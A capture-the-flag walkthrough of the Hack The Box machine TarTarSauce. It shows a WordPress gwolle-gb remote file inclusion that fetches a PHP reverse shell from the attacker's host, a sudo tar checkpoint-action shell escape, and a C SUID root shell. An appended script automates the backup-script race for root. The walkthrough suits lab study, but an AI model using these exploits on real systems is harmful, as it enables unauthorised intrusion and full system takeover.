Hack The Box - TarTarSauce


Initial access comes from a vulnerable WordPress plugin, and privilege escalation abuses a custom backup script. It's really a fun box.

Link: https://www.hackthebox.eu/home/machines/profile/138

Let's begin with the initial Nmap scan.

Nmap Scan Results

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Linux 3.12 (93%), Linux 3.13 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
1   248.39 ms
2   248.52 ms

HTTP Enumeration

Only HTTP is open, so I checked it and found a landing page with a welcome message. Let's dig in.


Enumerating Monstra (Rabbit Hole)

The Nmap scan shows a robots.txt with several disallowed entries.


First I checked /webservices/monstra-3.0.4/; all the other entries returned 404.


We know the version, so I looked for exploits and found one that dumps user credentials without authenticating.


Here we can see a username and a password hash, but the password is hashed, not stored in plaintext.


But when I went back to the home page, I was logged in as admin. That seems odd.


While looking for exploits I also found this one, where we can upload a file and get remote code execution.


According to the exploit, the upload extension filter can be bypassed by giving the payload an uppercase extension. I tried that and it didn't work.


After spending some time on this, I decided to brute-force directories instead, and found a new one:

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
2020/07/13 12:25:12 Starting gobuster
/wp (Status: 301)
2020/07/13 12:31:33 Finished

Getting User Shell

So it's confirmed: there is a WordPress site under /wp.


First I scanned for vulnerable plugins only, which revealed nothing, so I ran a full plugin enumeration with aggressive detection.

root@kali:~/CTF/HTB/Boxes/Tartarsauce# wpscan --url -e ap --plugins-detection aggressive 
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

[+] URL: []
[+] Started: Mon Jul 13 18:32:31 2020
[+] gwolle-gb
 | Location:
 | Last Updated: 2020-06-21T14:59:00.000Z
 | Readme:
 | [!] The version is out of date, the latest version is 4.0.4
 | Found By: Known Locations (Aggressive Detection)
 |  -, status: 200
 | Version: 2.3.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  -
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  -

This reveals a plugin I hadn't seen before, gwolle-gb 2.3.10, and it is out of date.

A quick searchsploit lookup shows a remote file inclusion (RFI) exploit for it.


According to the exploit, the vulnerable page includes wp-load.php from an attacker-controlled URL, so I named my PHP reverse shell wp-load.php and served it from my machine.

My Python HTTP server got the hit.


And the reverse shell landed in my nc listener.


The first thing I always do is check sudo -l, and it shows that www-data can run tar as user onuma without a password.

$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar



tar's --checkpoint-action option can run an arbitrary command while archiving, which lets us spawn a shell as onuma:

$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
$ whoami

Privilege Escalation

First I uploaded an enumeration script, which didn't reveal anything, so I uploaded pspy instead. After a while I got a hit: this runs as root.

2020/07/13 05:00:41 CMD: UID=0    PID=26257  | /bin/bash /usr/sbin/backuperer

So I checked the script. It is a bash script that does backup work:


#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
With the variables filled in, tmpfile is /var/tmp/.<40-hex-character sha1>, and the script does the following:
  • First it recursively deletes everything matching /var/tmp/.* and /var/tmp/check.
  • Then, as user onuma and in the background, it gzips everything under /var/www/html into that hidden tmpfile.
  • It sleeps for 30 seconds.
  • It creates the directory /var/tmp/check.
  • It extracts the archive into /var/tmp/check, as root.
  • It runs the integrity check: a recursive diff of /var/www/html against /var/tmp/check/var/www/html.
  • If they differ, it logs the error and exits with code 2 without cleaning up, so the extracted tree stays in /var/tmp/check until the next run (about 5 minutes later) deletes it. Otherwise it moves the archive to /var/backups/onuma-www-dev.bak and removes the check directory.

So what we need to do is replace the hidden tmpfile with our own archive during the 30-second sleep. Root then extracts our archive into /var/tmp/check; because its contents differ from /var/www/html the integrity check fails and the script exits without cleanup, leaving our files there for the next 5 minutes. Two details make this work: tar running as root restores ownership and mode bits from the archive by default, so a member stored as uid 0 with mode 4755 lands on disk as a root-owned SUID binary, and the archive therefore has to be built so that the member is recorded with uid 0 (for example by creating it as root on the attacking machine).

Since the machine is 32-bit, I wrote a small C program that spawns a shell, compiled it as a 32-bit binary (gcc -m32) and made it SUID root.

#include <unistd.h>
int main(void)
{
    setuid(0); setgid(0);   /* set the real ids too, otherwise bash drops euid 0 */
    execl("/bin/bash", "bash", "-p", (char *)NULL);
    return 0;
}

I created a var/www/html directory tree with the binary inside and packed it into a gzipped tar, mirroring the layout backuperer produces.


I ran pspy in one terminal and waited for the next run. Here it takes the backup and stores it in /var/tmp:

2020/07/13 23:46:43 CMD: UID=1000 PID=2738   | /bin/tar -zcvf /var/tmp/.f7b56259dddf91387805c988a567e7b2c594024d /var/www/html 
2020/07/13 23:46:43 CMD: UID=1000 PID=2737   | /bin/tar -zcvf /var/tmp/.f7b56259dddf91387805c988a567e7b2c594024d /var/www/html

I then copied my archive over the hidden one it had just created, keeping the same filename.


After the 30-second sleep, root extracted the (now replaced) archive:

2020/07/13 23:47:13 CMD: UID=0    PID=2749   | /bin/tar -zxvf /var/tmp/.f7b56259dddf91387805c988a567e7b2c594024d -C /var/tmp/check 
2020/07/13 23:47:13 CMD: UID=0    PID=2748   | /bin/tar -zxvf /var/tmp/.f7b56259dddf91387805c988a567e7b2c594024d -C /var/tmp/check

Now the check directory exists, and because the integrity check failed nothing gets cleaned up.


Running that SUID binary from /var/tmp/check gives me a root shell. We own the box!
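The packaging and the race above, scripted end to end, as an added example that is not part of the original writeup. It assumes ./pwn is the compiled 32-bit SUID shell from the C program above, and the /var/tmp location and 40-hex-character hidden filename come from backuperer itself. It uses tar's --owner/--group options to record the member as root, so the archive can be built without root on the attacking box; the mode (including the setuid bit) is taken from the staged file.

```shell
#!/bin/sh
# Added example (not the original writeup's commands): package the SUID payload the way
# backuperer expects and race its 30-second window.

# build_payload_archive PAYLOAD OUT_TGZ
# Stores PAYLOAD as var/www/html/pwn, recorded as root:root with mode 4755, so a tar
# extraction by root recreates a root-owned SUID binary under /var/tmp/check.
build_payload_archive() {
    payload="$1"; out="$2"
    stage=$(mktemp -d) || return 1
    mkdir -p "$stage/var/www/html"
    cp "$payload" "$stage/var/www/html/pwn"
    chmod 4755 "$stage/var/www/html/pwn"       # mode, incl. setuid bit, is read from the file
    tar --owner=root --group=root -zcf "$out" -C "$stage" var
    rc=$?
    rm -rf "$stage"
    return $rc
}

# archive_member_perms ARCHIVE MEMBER -> prints "<mode> <owner/group>" for MEMBER
# Use it to confirm the member is stored as -rwsr-xr-x root/root before racing.
archive_member_perms() {
    tar -tvzf "$1" | awk -v m="$2" '$NF == m { print $1, $2 }'
}

# is_backup_tmpfile PATH -> true if PATH looks like backuperer's /var/tmp/.<sha1> file
is_backup_tmpfile() {
    [ -f "$1" ] && basename "$1" | grep -Eq '^\.[0-9a-f]{40}$'
}

# race_backup ARCHIVE [TMPDIR]
# Polls TMPDIR until onuma's hidden temp archive appears and overwrites it with ARCHIVE;
# this has to happen inside the 30-second sleep, before root extracts it.
race_backup() {
    archive="$1"; dir="${2:-/var/tmp}"
    while :; do
        for f in "$dir"/.*; do
            if is_backup_tmpfile "$f"; then
                cp "$archive" "$f" && echo "replaced $f" && return 0
            fi
        done
        sleep 1
    done
}

# Usage on the target (as www-data or onuma), after copying payload.tgz over:
#   sh race.sh --run ./payload.tgz
# Once root has extracted it, run /var/tmp/check/var/www/html/pwn for the root shell.
if [ "${1:-}" = "--run" ]; then
    race_backup "$2"
    until [ -u /var/tmp/check/var/www/html/pwn ]; do sleep 1; done
    echo "root SUID binary ready: /var/tmp/check/var/www/html/pwn"
fi
```

Build the archive on the attacking machine with `build_payload_archive ./pwn payload.tgz`, check it with `archive_member_perms payload.tgz var/www/html/pwn`, then run the race on the target; polling once a second is plenty since the window is 30 seconds.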